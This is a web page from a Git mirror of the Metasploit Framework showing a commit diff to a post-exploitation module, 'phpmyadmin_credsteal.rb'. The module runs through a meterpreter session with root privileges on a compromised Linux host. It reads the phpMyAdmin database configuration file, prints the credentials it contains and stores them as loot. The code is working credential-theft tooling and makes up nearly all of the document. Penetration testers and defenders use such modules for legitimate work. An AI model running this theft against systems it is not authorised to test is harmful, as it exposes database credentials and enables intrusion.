infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updating store_loot?

GSoC/Meterpreter_Web_Console
Dhiraj Mishra 2018-08-20 16:57:09 +05:30 committed by GitHub
parent a018d24df4
commit 107baee0a2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
modules/post/linux/gather/phpmyadmin_credsteal.rb
View File

@ -4,6 +4,7 @@
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
@ -16,15 +17,16 @@ class MetasploitModule < Msf::Post
},
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Privileged' => 'true', #This requires root privileges
'SessionTypes' => ['meterpreter'],
'Arch' => 'x86_x64',
'Privileged' => 'true',
'References' =>
[
[ 'CVE', '0000-0000' ] # This module does not require any CVE this was added to pass msftidy.
],
'Author' => [
'bofheaded',
'Chaitanya Haritash [bofheaded]',
'Dhiraj Mishra <dhiraj@notsosecure.com>'
]
))
@ -36,7 +38,10 @@ class MetasploitModule < Msf::Post
end
def run
print_line('PhpMyAdmin Creds Stealer')
sess = client
print_line("\nPhpMyAdmin Creds Stealer!\n")
cred_dump = ""
if session.platform.include?("windows")
print_error("This Module is not Compatible with Windows")
@ -44,23 +49,19 @@ class MetasploitModule < Msf::Post
end
conf_path= "/etc/phpmyadmin/config-db.php"
unless file_exist?(conf_path)
vprint_error("#{conf_path} doesn't exist on target")
if file_exist?(conf_path) == false
print_error("#{conf_path} doesn't exist on target")
return
end
print_good('PhpMyAdmin config found!')
print_good("Extracting config file!\n")
print_good("Extracting Creds")
res = read_file(conf_path)
print_line res
vprint_good("#{peer} - #{res.body}")
path = store_loot(
'phpmyadmin.credsteal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
cred_dump << res
store_loot("phpmyadmin_conf","text/plain",sess,cred_dump,"phpmyadmin_conf.txt","phpmyadmin_conf")
print_good("Storing dump in ~/.msf4/loot/")
print_status("Extracted Creds ::\n")
print_line(res)
end
end